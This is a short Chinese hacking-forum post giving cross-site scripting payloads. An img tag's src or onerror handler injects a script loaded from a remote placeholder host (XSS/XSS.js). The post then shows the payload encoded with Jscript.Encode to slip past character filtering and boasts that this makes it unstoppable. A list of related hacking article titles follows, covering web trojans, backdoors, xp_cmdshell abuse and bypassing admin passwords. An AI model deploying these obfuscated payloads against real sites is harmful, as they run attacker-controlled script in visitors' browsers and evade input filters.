|
| 以下是引用片段: <img src="javascript:try{var s=document.createElement(’script’);s.src=’http://XSS/XSS.js’;document.body.appendChild(s);}catch(e){}"></img> |
字符过滤怎么办?用Encode加密后就无敌了~
未加密前:
| 以下是引用片段: <img src=’#’ XSS="try{var s=document.createElement(’script’);s.src=’http://XSS/XSS.js’;document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),’Jscript.Encode’);" > |
加密后:
| 以下是引用片段: <img src=’#’ XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es+UYcm.nmY+As+s+xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs+ OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),’Jscript.Encode’);" > |
嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码
| 没有路由密码权限时的鸽子上线方 | 08-23 |
| 完全解析网页后门和挂马 | 04-02 |
| 真实的网络攻击取证纪实 | 03-27 |
| 利用404错误页面挂马 | 03-21 |
| 解密风暴 | 03-21 |
| 社会工程学在黑客中的应用 | 01-02 |
| 轻轻松松解密各种网页木马 | 12-21 |
| SA权限无xp_cmdshell时取权限又一 | 12-14 |
| sqlserver2005中恢复xp_cmdshell | 11-10 |
| 实现无net.exe和net1.exe添加系统 | 10-26 |
| 用U盘轻松去除XP管理员密码 | 10-26 |
| 教你多种保护措施限用移动硬盘 | 10-09 |